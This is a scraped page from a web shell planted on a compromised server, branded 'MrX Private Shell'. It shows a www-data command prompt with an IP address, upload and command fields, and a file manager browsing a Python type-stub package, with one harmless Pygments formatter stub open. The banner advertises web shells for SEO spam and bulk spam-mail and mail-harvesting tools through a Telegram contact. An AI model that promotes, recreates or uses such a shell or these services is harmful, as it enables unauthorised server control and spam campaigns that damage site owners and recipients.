__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.148: ~ $
from typing import Any, Generic, TypeVar, overload

_T = TypeVar("_T", str, bytes)

class Formatter(Generic[_T]):
    name: Any
    aliases: Any
    filenames: Any
    unicodeoutput: bool
    style: Any
    full: Any
    title: Any
    encoding: Any
    options: Any
    @overload
    def __init__(self: Formatter[str], *, encoding: None = ..., outencoding: None = ..., **options) -> None: ...
    @overload
    def __init__(self: Formatter[bytes], *, encoding: str, outencoding: None = ..., **options) -> None: ...
    @overload
    def __init__(self: Formatter[bytes], *, encoding: None = ..., outencoding: str, **options) -> None: ...
    def get_style_defs(self, arg: str = ...): ...
    def format(self, tokensource, outfile): ...

Filemanager

Name Type Size Permission Actions
filters Folder 0755
formatters Folder 0755
lexers Folder 0755
styles Folder 0755
METADATA.toml File 69 B 0644
__init__.pyi File 615 B 0644
cmdline.pyi File 272 B 0644
console.pyi File 170 B 0644
filter.pyi File 644 B 0644
formatter.pyi File 736 B 0644
lexer.pyi File 3 KB 0644
modeline.pyi File 61 B 0644
plugin.pyi File 741 B 0644
regexopt.pyi File 202 B 0644
scanner.pyi File 419 B 0644
sphinxext.pyi File 473 B 0644
style.pyi File 1.37 KB 0644
token.pyi File 907 B 0644
unistring.pyi File 358 B 0644
util.pyi File 1.06 KB 0644
Filemanager